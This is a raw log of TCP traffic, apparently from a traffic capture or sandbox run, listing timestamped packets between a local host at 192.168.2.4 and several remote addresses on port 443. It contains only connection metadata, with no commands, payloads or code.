Dec 4, 2024 12:17:25.215975046 CET	443	49808	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.216052055 CET	443	49808	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.222774029 CET	49808	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.232634068 CET	443	49813	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.264946938 CET	49808	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.264946938 CET	49808	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.264977932 CET	443	49808	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.264987946 CET	443	49808	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.286767960 CET	49813	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.298767090 CET	49813	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.298796892 CET	443	49813	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.306775093 CET	49813	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.306787968 CET	443	49813	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.400509119 CET	49820	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.400561094 CET	443	49820	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.401504993 CET	49820	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.412650108 CET	49820	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.412662029 CET	443	49820	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.471132040 CET	443	49811	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.471203089 CET	443	49811	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.471286058 CET	49811	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.483361959 CET	49811	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.483390093 CET	443	49811	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.483437061 CET	49811	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.483443022 CET	443	49811	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.487845898 CET	443	49812	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.487917900 CET	443	49812	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.489054918 CET	49821	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.489104986 CET	443	49821	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.489208937 CET	49812	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.489294052 CET	49821	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.489375114 CET	49812	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.489396095 CET	443	49812	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.489425898 CET	49812	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.489432096 CET	443	49812	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.490183115 CET	49821	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.490195036 CET	443	49821	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.492050886 CET	49822	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.492082119 CET	443	49822	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.492588043 CET	49822	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.492588043 CET	49822	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.492620945 CET	443	49822	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.500296116 CET	443	49810	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.500355959 CET	443	49810	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.500627995 CET	49810	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.500900030 CET	49810	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.500907898 CET	443	49810	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.500936985 CET	49810	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.500941992 CET	443	49810	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.516168118 CET	49824	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.516191006 CET	443	49824	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.516256094 CET	49824	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.516398907 CET	49824	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.516412020 CET	443	49824	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.676744938 CET	443	49813	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.676815987 CET	443	49813	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.676870108 CET	49813	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.688642979 CET	49813	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.688664913 CET	443	49813	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.688676119 CET	49813	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.688682079 CET	443	49813	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.692058086 CET	49825	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.692090034 CET	443	49825	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.692163944 CET	49825	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.692471027 CET	49825	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.692483902 CET	443	49825	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.895916939 CET	49800	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:25.906250000 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:25.906312943 CET	443	49826	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:25.906387091 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:25.906842947 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:25.906861067 CET	443	49826	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:26.233967066 CET	443	49819	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:26.234050989 CET	49819	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:26.237313032 CET	49819	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:26.237324953 CET	443	49819	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:26.239623070 CET	49819	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:26.239628077 CET	443	49819	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:27.193783045 CET	443	49820	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.194912910 CET	49820	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.194912910 CET	49820	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.194936037 CET	443	49820	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.194947004 CET	443	49820	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.208282948 CET	443	49822	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.208910942 CET	49822	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.208931923 CET	443	49822	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.209300041 CET	49822	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.209311008 CET	443	49822	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.233036995 CET	443	49824	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.233920097 CET	49824	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.233920097 CET	49824	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.233947039 CET	443	49824	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.233962059 CET	443	49824	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.269174099 CET	443	49821	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.269782066 CET	49821	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.269805908 CET	443	49821	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.272767067 CET	49821	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.272773027 CET	443	49821	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.295099974 CET	443	49819	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:27.295173883 CET	443	49819	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:27.295207977 CET	49819	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.295289993 CET	49819	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.296745062 CET	49819	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.296762943 CET	443	49819	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:27.304315090 CET	443	49826	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:27.304430962 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.305104017 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.305114985 CET	443	49826	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:27.307333946 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.307338953 CET	443	49826	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:27.307533026 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.307548046 CET	443	49826	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:27.307554007 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.307558060 CET	443	49826	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:27.307708979 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.307732105 CET	443	49826	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:27.307920933 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.307940960 CET	443	49826	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:27.307948112 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.307959080 CET	443	49826	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:27.308116913 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.308155060 CET	443	49826	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:27.308195114 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.308203936 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.308209896 CET	443	49826	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:27.308219910 CET	443	49826	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:27.308223963 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.308235884 CET	443	49826	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:27.308249950 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.308257103 CET	443	49826	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:27.308271885 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.308283091 CET	443	49826	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:27.308361053 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.308370113 CET	443	49826	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:27.308386087 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.308396101 CET	443	49826	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:27.308412075 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.308423042 CET	443	49826	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:27.417820930 CET	443	49825	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.418417931 CET	49825	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.418443918 CET	443	49825	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.421648979 CET	49825	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.421655893 CET	443	49825	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.637774944 CET	443	49820	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.637859106 CET	443	49820	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.637972116 CET	49820	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.638190985 CET	49820	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.638211012 CET	443	49820	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.638222933 CET	49820	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.638227940 CET	443	49820	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.641784906 CET	49827	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.641851902 CET	443	49827	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.641927958 CET	49827	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.642112970 CET	49827	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.642129898 CET	443	49827	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.643831015 CET	443	49822	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.643904924 CET	443	49822	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.643982887 CET	49822	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.644107103 CET	49822	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.644120932 CET	443	49822	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.644143105 CET	49822	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.644148111 CET	443	49822	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.646836996 CET	49828	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.646882057 CET	443	49828	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.646950960 CET	49828	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.647079945 CET	49828	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.647092104 CET	443	49828	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.667769909 CET	443	49824	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.667849064 CET	443	49824	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.668093920 CET	49824	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.668143988 CET	49824	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.668143988 CET	49824	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.668165922 CET	443	49824	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.668174982 CET	443	49824	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.670536041 CET	49829	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.670584917 CET	443	49829	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.670659065 CET	49829	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.670814037 CET	49829	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.670831919 CET	443	49829	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.715708017 CET	443	49821	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.715794086 CET	443	49821	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.715888023 CET	49821	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.725987911 CET	49821	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.726015091 CET	443	49821	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.726062059 CET	49821	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.726068020 CET	443	49821	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.729604006 CET	49830	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.729676962 CET	443	49830	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.729743004 CET	49830	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.729904890 CET	49830	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.729918957 CET	443	49830	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.852556944 CET	443	49825	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.852622032 CET	443	49825	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.852722883 CET	49825	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.852979898 CET	49825	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.852997065 CET	443	49825	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.853005886 CET	49825	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.853012085 CET	443	49825	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.856127024 CET	49831	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.856173038 CET	443	49831	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.856252909 CET	49831	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.856513023 CET	49831	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:27.856528997 CET	443	49831	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:27.918226004 CET	49832	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.918261051 CET	443	49832	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:27.918346882 CET	49832	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.918714046 CET	49832	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:27.918725014 CET	443	49832	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:29.172009945 CET	443	49826	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:29.172099113 CET	443	49826	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:29.172122955 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:29.172147036 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:29.173062086 CET	49826	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:29.173083067 CET	443	49826	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:29.360254049 CET	443	49832	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:29.360348940 CET	49832	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:29.360893965 CET	49832	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:29.360904932 CET	443	49832	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:29.362951040 CET	49832	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:29.362956047 CET	443	49832	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:29.363085985 CET	49832	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:29.363104105 CET	443	49832	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:29.363214016 CET	49832	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:29.363234997 CET	443	49832	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:29.363301992 CET	49832	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:29.363318920 CET	443	49832	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:29.423238039 CET	443	49827	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.423820019 CET	49827	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.423846960 CET	443	49827	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.424473047 CET	49827	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.424478054 CET	443	49827	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.458064079 CET	443	49829	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.458676100 CET	49829	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.458709002 CET	443	49829	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.459204912 CET	49829	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.459211111 CET	443	49829	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.510514021 CET	443	49830	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.511231899 CET	49830	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.511246920 CET	443	49830	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.511733055 CET	49830	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.511739016 CET	443	49830	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.641190052 CET	443	49831	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.641854048 CET	49831	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.641884089 CET	443	49831	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.642368078 CET	49831	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.642373085 CET	443	49831	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.866955042 CET	443	49827	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.867037058 CET	443	49827	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.867098093 CET	49827	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.886964083 CET	49827	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.887000084 CET	443	49827	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.898158073 CET	49833	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.898222923 CET	443	49833	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.898286104 CET	49833	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.898709059 CET	49833	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.898726940 CET	443	49833	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.902082920 CET	443	49829	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.902149916 CET	443	49829	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.902198076 CET	49829	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.902333975 CET	49829	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.902354002 CET	443	49829	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.902367115 CET	49829	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.902373075 CET	443	49829	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.906619072 CET	49834	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.906661987 CET	443	49834	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.906725883 CET	49834	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.906897068 CET	49834	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.906910896 CET	443	49834	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.984980106 CET	49835	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:29.985033989 CET	443	49835	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:29.985146046 CET	49835	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:29.985146999 CET	443	49830	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.985234022 CET	443	49830	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.985295057 CET	49830	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.985377073 CET	49835	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:29.985394955 CET	443	49835	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:29.985666037 CET	49830	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.985686064 CET	443	49830	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.985722065 CET	49830	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.985728025 CET	443	49830	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.988251925 CET	49836	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.988295078 CET	443	49836	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:29.988374949 CET	49836	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.988506079 CET	49836	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:29.988519907 CET	443	49836	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:30.085381031 CET	443	49831	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:30.085445881 CET	443	49831	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:30.085501909 CET	49831	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:30.089756966 CET	49831	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:30.089780092 CET	443	49831	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:30.089791059 CET	49831	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:30.089797974 CET	443	49831	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:30.105127096 CET	49837	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:30.105186939 CET	443	49837	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:30.105264902 CET	49837	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:30.105456114 CET	49837	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:30.105473995 CET	443	49837	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:30.852068901 CET	443	49832	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:30.852149963 CET	443	49832	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:30.852171898 CET	49832	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:30.852195024 CET	49832	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:30.853223085 CET	49832	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:30.853241920 CET	443	49832	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:31.000495911 CET	49838	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:31.000566006 CET	443	49838	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:31.000641108 CET	49838	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:31.000917912 CET	49838	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:31.000930071 CET	443	49838	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:31.188837051 CET	443	49828	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:31.189469099 CET	49828	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:31.189482927 CET	443	49828	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:31.190098047 CET	49828	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:31.190103054 CET	443	49828	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:31.382760048 CET	443	49835	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:31.382836103 CET	49835	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:31.383367062 CET	49835	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:31.383378983 CET	443	49835	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:31.385783911 CET	49835	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:31.385790110 CET	443	49835	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:31.385863066 CET	49835	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:31.385879040 CET	443	49835	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:31.385884047 CET	49835	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:31.385889053 CET	443	49835	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:31.385991096 CET	49835	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:31.386012077 CET	443	49835	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:31.386018038 CET	49835	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:31.386023998 CET	443	49835	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:31.386127949 CET	49835	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:31.386148930 CET	49835	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:31.386148930 CET	49835	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:31.386190891 CET	443	49835	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:31.386307955 CET	49835	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:31.386323929 CET	443	49835	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:31.386343002 CET	49835	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:31.386352062 CET	443	49835	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:31.386360884 CET	49835	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:31.386365891 CET	443	49835	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:31.386384010 CET	49835	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:31.386390924 CET	443	49835	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:31.622642994 CET	443	49834	13.107.246.63	192.168.2.4
